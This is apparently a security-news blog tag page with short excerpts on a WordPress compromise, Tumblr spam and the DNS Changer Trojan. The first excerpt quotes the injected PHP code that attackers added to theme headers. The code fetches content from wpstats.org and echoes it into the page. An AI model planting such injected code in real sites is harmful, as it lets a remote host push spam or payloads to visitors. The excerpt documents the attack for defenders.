The Latest in IT Security

Posts Tagged ‘Blog’

If you are seeing hidden links in your WordPress site, it could be coming from wpstats.org. On some blackhat spam cases we are analysing, the following code was added to the theme header of the compromised site: if(function_exists(‘curl_init’)) { $url = "http://www.wpstats.org/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo […]

Read more ...

Click to Enlarge Better late than never, although both are preferable to being at the scene of the crime in a recent case of repeated spamposts across what appears to be a large number of Tumblr accounts. It seems three Tumblrs – all of which are now offline – were responsible for exploiting the site […]

Read more ...

Anyone closely following the news might have come across reports regarding netizens that would be disconnected from the Internet after July 9. Media calls this the “Internet Doomsday”, and online campaigns asking Internet users to check their systems for a possible DNS Changer infection is, as of this writing, ongoing. DNS Changer is a Trojan […]

Read more ...


Categories

SATURDAY, MARCH 15, 2025
WHITE PAPERS

Mission-Critical Broadband – Why Governments Should Partner with Commercial Operators:
Many governments embrace mobile network operator (MNO) networks as ...

ARA at Scale: How to Choose a Solution That Grows With Your Needs:
Application release automation (ARA) tools enable best practices in...

The Multi-Model Database:
Part of the “new normal” where data and cloud applications are ...

Featured

Archives

Latest Comments